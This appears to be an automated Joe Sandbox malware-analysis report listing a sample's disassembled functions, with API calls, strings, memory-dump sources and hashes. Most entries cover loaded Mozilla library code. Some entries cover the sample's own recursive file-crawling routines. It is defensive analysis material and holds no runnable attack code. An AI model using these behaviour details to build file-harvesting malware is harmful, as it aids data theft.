Opcode Fuzzy Hash: 627b014f5b35808323b5fbbfc06ebe8b20af95b298467aeb2126c9a0d2365979
Instruction Fuzzy Hash: 1F2202B4A08B809FEB009FA6845575A77B4FF56348F040529F88697F41EB30DA4ECB57

Function 6CBA6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CBA6CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CBA6D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6CBA6D26

Part of subcall function 6CBACA10: malloc.MOZGLUE(?), ref: 6CBACA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6CBA6D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CBA6D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6CBA6D73
free.MOZGLUE(00000000), ref: 6CBA6D80
CertGetNameStringW.CRYPT32 ref: 6CBA6DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6CBA6DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CBA6DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6CBA6DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6CBA6E10
CryptMsgClose.CRYPT32(00000000), ref: 6CBA6E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6CBA6E34
CreateFileW.KERNEL32 ref: 6CBA6EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6CBA6F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CBA6F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6CBA709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CBA7103
free.MOZGLUE(00000000), ref: 6CBA7153
CloseHandle.KERNEL32(?), ref: 6CBA7176
__Init_thread_footer.LIBCMT ref: 6CBA7209
__Init_thread_footer.LIBCMT ref: 6CBA723A
__Init_thread_footer.LIBCMT ref: 6CBA726B
__Init_thread_footer.LIBCMT ref: 6CBA729C
__Init_thread_footer.LIBCMT ref: 6CBA72DC
__Init_thread_footer.LIBCMT ref: 6CBA730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6CBA73C2
VerSetConditionMask.NTDLL ref: 6CBA73F3
VerSetConditionMask.NTDLL ref: 6CBA73FF
VerSetConditionMask.NTDLL ref: 6CBA7406
VerSetConditionMask.NTDLL ref: 6CBA740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CBA741A
moz_xmalloc.MOZGLUE(?), ref: 6CBA755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CBA7568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6CBA7585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CBA7598
free.MOZGLUE(00000000), ref: 6CBA75AC

Part of subcall function 6CBCAB89: EnterCriticalSection.KERNEL32(6CC1E370,?,?,?,6CB934DE,6CC1F6CC,?,?,?,?,?,?,?,6CB93284), ref: 6CBCAB94
Part of subcall function 6CBCAB89: LeaveCriticalSection.KERNEL32(6CC1E370,?,6CB934DE,6CC1F6CC,?,?,?,?,?,?,?,6CB93284,?,?,6CBB56F6), ref: 6CBCABD1

Strings

CryptCATAdminReleaseCatalogContext, xrefs: 6CBA72C8
SHA256, xrefs: 6CBA6EC0
(, xrefs: 6CBA768A
wintrust.dll, xrefs: 6CBA72CD

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 99b94f22a83e4ed2353bba1461fa59eb5de426bfafbd5219ede476ff7a3fbc25
Instruction ID: 2855f49ab4c37e5370cb2cad7383cdd69f0adfb73fb9a79a396c2236360a153b
Opcode Fuzzy Hash: 99b94f22a83e4ed2353bba1461fa59eb5de426bfafbd5219ede476ff7a3fbc25
Instruction Fuzzy Hash: D452F7B1A083549FEB21DF65CC85BAA77B8FF46704F104199E448A7A40DB70AF86CF51

Function 6CBD0DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CBD0F1F
LeaveCriticalSection.KERNEL32(?), ref: 6CBD0F99
memcpy.VCRUNTIME140(?,?,?), ref: 6CBD0FB7
EnterCriticalSection.KERNEL32(?), ref: 6CBD0FE9
memset.VCRUNTIME140(?,000000E5,00000000), ref: 6CBD1031
LeaveCriticalSection.KERNEL32(?), ref: 6CBD10D0
EnterCriticalSection.KERNEL32(?), ref: 6CBD117D
memset.VCRUNTIME140(?,000000E5,?), ref: 6CBD1C39
EnterCriticalSection.KERNEL32(6CC1E744), ref: 6CBD3391
LeaveCriticalSection.KERNEL32(6CC1E744), ref: 6CBD33CD
LeaveCriticalSection.KERNEL32(?), ref: 6CBD3431
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CBD3437

Strings

Compile-time page size does not divide the runtime one., xrefs: 6CBD3946
MOZ_RELEASE_ASSERT(mNode), xrefs: 6CBD3559, 6CBD382D, 6CBD3848
: (malloc) Unsupported character in malloc options: ', xrefs: 6CBD3A02
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6CBD37D2
<jemalloc>, xrefs: 6CBD3941, 6CBD39F1
MOZ_CRASH(), xrefs: 6CBD3950
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6CBD37BD
MALLOC_OPTIONS, xrefs: 6CBD35FE
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6CBD3793
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6CBD37A8

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3040639385-4173974723
Opcode ID: 477d33d0c6f9de27c7f3051f2143a42f3b3862877eaef818ce9a8a97094265f9
Instruction ID: 4046effcc3f917ba1bee76ea3ff45e7c0aaeca61a9b4d458dbca1add473e2a9d
Opcode Fuzzy Hash: 477d33d0c6f9de27c7f3051f2143a42f3b3862877eaef818ce9a8a97094265f9
Instruction Fuzzy Hash: 8D537B71A057828FD704CF29C540615BBF1FF89328F2AC66DE8699BB91D771E841CB82

Function 6CBF34A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF3527
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF355B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF35BC
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF35E0
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF363A
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF3693
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF36CD
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF3703
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF373C
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF3775
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF378F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF3892
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF38BB
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF3902
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF3939
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF3970
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF39EF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF3A26
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF3AE5
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF3E85
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF3EBA
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF3EE2

Part of subcall function 6CBF6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6CBF61DD
Part of subcall function 6CBF6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6CBF622C

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF40F9
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF412F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF4157

Part of subcall function 6CBF6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CBF6250
Part of subcall function 6CBF6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBF6292

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF441B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBF4448
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CBF484E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CBF4863
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CBF4878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CBF4896
free.MOZGLUE ref: 6CBF489F

Strings

, xrefs: 6CBF4CD2

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: floor$free$malloc$memcpy
String ID:
API String ID: 3842999660-3916222277
Opcode ID: 63337c62e96259e0a13d8c9e83944ad0aa664c0374d70f49f3ad6e3348fa33bf
Instruction ID: 072acde324516fce0709eac76ff31742fe70170c9b02f0c8d0ad2e1a336e1b5b
Opcode Fuzzy Hash: 63337c62e96259e0a13d8c9e83944ad0aa664c0374d70f49f3ad6e3348fa33bf
Instruction Fuzzy Hash: 6CF24A74908B808FC725CF29C18469AFBF1FFCA354F118A5ED99997711DB329886CB42

Function 6CBA64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6CBA64DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6CBA64F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6CBA6505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6CBA6518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6CBA652B
memcpy.VCRUNTIME140(?,?,?), ref: 6CBA671C
GetCurrentProcess.KERNEL32 ref: 6CBA6724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CBA672F
GetCurrentProcess.KERNEL32 ref: 6CBA6759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CBA6764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6CBA6A80
GetSystemInfo.KERNEL32(?), ref: 6CBA6ABE
__Init_thread_footer.LIBCMT ref: 6CBA6AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBA6AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBA6AF7

Strings

nvdxgiwrap.dll, xrefs: 6CBA6513
detoured.dll, xrefs: 6CBA64DA
user32.dll, xrefs: 6CBA6526
nvd3d9wrap.dll, xrefs: 6CBA6500
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6CBA6798
_etoured.dll, xrefs: 6CBA64ED

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: 08cbfbd007059738a3d27b95e726681ea8640e1dd30317874eb0ca75e71184c3
Instruction ID: f459b43ad5a2aac08c2577a60dc6f1074e99f2228b6826758c1c63f259324c60
Opcode Fuzzy Hash: 08cbfbd007059738a3d27b95e726681ea8640e1dd30317874eb0ca75e71184c3
Instruction Fuzzy Hash: 47F1F6B0A092598FDB20CFA9CC4879AB7B5FF06318F144199D859E3B41E731AE86CF51

Function 007738B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 007738CC
FindFirstFileA.KERNEL32(?,?), ref: 007738E3
lstrcat.KERNEL32(?,?), ref: 00773935
StrCmpCA.SHLWAPI(?,00780F70), ref: 00773947
StrCmpCA.SHLWAPI(?,00780F74), ref: 0077395D
FindNextFileA.KERNEL32(000000FF,?), ref: 00773C67
FindClose.KERNEL32(000000FF), ref: 00773C7C

Strings

%s\*, xrefs: 007738C0
%s\%s, xrefs: 0077397A
%s\%s\%s, xrefs: 00773A4A
%s\%s, xrefs: 00773A6F
%s%s, xrefs: 00773AAD

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: c01273fe286fb27bafc8f28528435417fd4868f1d01cad786d3a1fa6995149d7
Instruction ID: e8fae59391f76b3fda75430f522ec44b6977eba0f846f8b8217f1400bbce578c
Opcode Fuzzy Hash: c01273fe286fb27bafc8f28528435417fd4868f1d01cad786d3a1fa6995149d7
Instruction Fuzzy Hash: C0A142B19102189BDF64DB64DC89FFE7378BF49340F048588B60D96141EB789B84DFA2

Function 6CBFC4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CBFC5F9
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CBFC6FB
memset.VCRUNTIME140(?,00000000,00004008), ref: 6CBFC74D
memset.VCRUNTIME140(?,00000000,00004008), ref: 6CBFC7DE
memset.VCRUNTIME140(?,00000000,00004014), ref: 6CBFC9D5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CBFCC76
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CBFCD7A
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CBFDB40
memcpy.VCRUNTIME140(?,?,?), ref: 6CBFDB62
memcpy.VCRUNTIME140(?,?,?), ref: 6CBFDB99
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CBFDD8B
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CBFDE95
memcpy.VCRUNTIME140(?,?,?), ref: 6CBFE360
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CBFE432
memcpy.VCRUNTIME140(?,?,?), ref: 6CBFE472

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction ID: 4b266662780017bf2ccc5bb0619d9c400ad6fb1034a41c43843ab1ac9010de7b
Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction Fuzzy Hash: C933A071E0025ACFCB14CFA8C8806EDBBF2FF49310F194269D965AB755D731A94ACB90

Function 00774570 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,ogle.com.google.com *.mn 1.google.com.google.com *.lb 1.google.com.google.com *.es 1.google.com.google.com *.org 1.google.com.google.com *.uk 1.google.com.google.com *.ug 1.google.com.google.com<br), ref: 00774580
RtlAllocateHeap.NTDLL(00000000), ref: 00774587
wsprintfA.USER32 ref: 007745A6
FindFirstFileA.KERNEL32(?,?), ref: 007745BD
StrCmpCA.SHLWAPI(?,00780FC4), ref: 007745EB
StrCmpCA.SHLWAPI(?,00780FC8), ref: 00774601
FindNextFileA.KERNEL32(000000FF,?), ref: 0077468B
FindClose.KERNEL32(000000FF), ref: 007746A0
lstrcat.KERNEL32(?,0125E968), ref: 007746C5
lstrcat.KERNEL32(?,0125D7B0), ref: 007746D8
lstrlen.KERNEL32(?), ref: 007746E5
lstrlen.KERNEL32(?), ref: 007746F6

Strings

%s\%s, xrefs: 0077461B
%s\*, xrefs: 0077459A
ogle.com.google.com *.mn 1.google.com.google.com *.lb 1.google.com.google.com *.es 1.google.com.google.com *.org 1.google.com.google.com *.uk 1.google.com.google.com *.ug 1.google.com.google.com<br, xrefs: 00774579

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*$ogle.com.google.com *.mn 1.google.com.google.com *.lb 1.google.com.google.com *.es 1.google.com.google.com *.org 1.google.com.google.com *.uk 1.google.com.google.com *.ug 1.google.com.google.com<br
API String ID: 671575355-3509088531
Opcode ID: 4ae513c0aa595a5b41bfeb5e021885433cfa5afab424a1c150ee576d5232dc08
Instruction ID: f64c7c1dd081e340cfcf3f1ab8529a41936c741c2d9cd82059bc323927d9bdfd
Opcode Fuzzy Hash: 4ae513c0aa595a5b41bfeb5e021885433cfa5afab424a1c150ee576d5232dc08
Instruction Fuzzy Hash: C65144B19542189BCB64EB70DC89FEE737CAF58300F408588B61E92050EB789B84CFD2

Function 6CBBED10 Relevance: 25.4, APIs: 16, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6CBBEE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6CBBEFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6CBC1695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBC16B4
memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6CBC1770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CBC1A3E

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID:
API String ID: 3693777188-0
Opcode ID: 57988b89fd6e020c303b50f41f4d33bec0b9cf9b62520bb427f588ea38cdc85a
Instruction ID: 1635a367e66fa894034bd52a8b7c12233bfccc1d831f1fb052b4bc1be6f47064
Opcode Fuzzy Hash: 57988b89fd6e020c303b50f41f4d33bec0b9cf9b62520bb427f588ea38cdc85a
Instruction Fuzzy Hash: 7EB33875E002598FCB14CFA8C890AADB7B2FF49304F6981A9D449BB745D730AD86CF91

Function 0076ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0076ED3E
FindFirstFileA.KERNEL32(?,?), ref: 0076ED55
StrCmpCA.SHLWAPI(?,00781538), ref: 0076EDAB
StrCmpCA.SHLWAPI(?,0078153C), ref: 0076EDC1
FindNextFileA.KERNEL32(000000FF,?), ref: 0076F2AE
FindClose.KERNEL32(000000FF), ref: 0076F2C3

Strings

%s\*.*, xrefs: 0076ED32

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
